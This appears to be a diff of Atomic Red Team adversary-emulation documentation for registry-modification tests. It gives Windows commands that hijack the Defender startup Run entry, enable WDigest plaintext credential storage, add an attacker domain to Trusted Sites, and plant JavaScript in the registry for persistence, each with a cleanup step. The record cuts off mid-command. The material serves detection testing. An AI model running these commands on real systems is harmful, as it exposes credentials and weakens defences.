## Atomic Test #2 - Modify Registry of Local Machine - cmd -Modify the Local Machine registry RUN key to change Windows Defender executable that should be ran on startup. This should only be possible when + +Modify the Local Machine registry RUN key to change Windows Defender executable that should be ran on startup. This +should only be possible when CMD is ran as Administrative rights. Upon execution, the message "The operation completed successfully." -will be displayed. Additionally, open Registry Editor to view the modified entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Run. +will be displayed. Additionally, open Registry Editor to view the modified entry in +HKCU\Software\Microsoft\Windows\CurrentVersion\Run. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | new_executable | New executable to run on startup instead of Windows Defender | string | calc.exe| - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d #{new_executable} /f ``` #### Cleanup Commands: + ```cmd reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v SecurityHealth /f >nul 2>&1 ``` - - - -

## Atomic Test #3 - Modify registry to store logon credentials -Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping). + +Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / +cleartext password dumping). Upon execution, the message "The operation completed successfully." will be displayed. -Additionally, open Registry Editor to view the modified entry in HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest. +Additionally, open Registry Editor to view the modified entry in +HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f ``` #### Cleanup Commands: + ```cmd reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f >nul 2>&1 ``` - - - -

## Atomic Test #4 - Add domain to Trusted sites Zone -Attackers may add a domain to the trusted site zone to bypass defenses. Doing this enables attacks such as c2 over office365. + +Attackers may add a domain to the trusted site zone to bypass defenses. Doing this enables attacks such as c2 over +office365. Upon execution, details of the new registry entries will be displayed. -Additionally, open Registry Editor to view the modified entry in HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\. +Additionally, open Registry Editor to view the modified entry in HKCU: +\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\. https://www.blackhat.com/docs/us-17/wednesday/us-17-Dods-Infecting-The-Enterprise-Abusing-Office365-Powershell-For-Covert-C2.pdf **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | bad_domain | Domain to add to trusted site zone | String | bad-domain.com| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell $key= "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\#{bad_domain}\" @@ -148,42 +144,33 @@ new-itemproperty $key$name -Name * -Value 2 -Type DWORD; ``` #### Cleanup Commands: + ```powershell $key = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\#{bad_domain}\" Remove-item $key -Recurse -ErrorAction Ignore ``` - - - -

## Atomic Test #5 - Javascript in registry + Upon execution, a javascript block will be placed in the registry for persistence. -Additionally, open Registry Editor to view the modified entry in HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings. +Additionally, open Registry Editor to view the modified entry in HKCU: +\Software\Microsoft\Windows\CurrentVersion\Internet Settings. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell New-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" -Name T1112 -Value "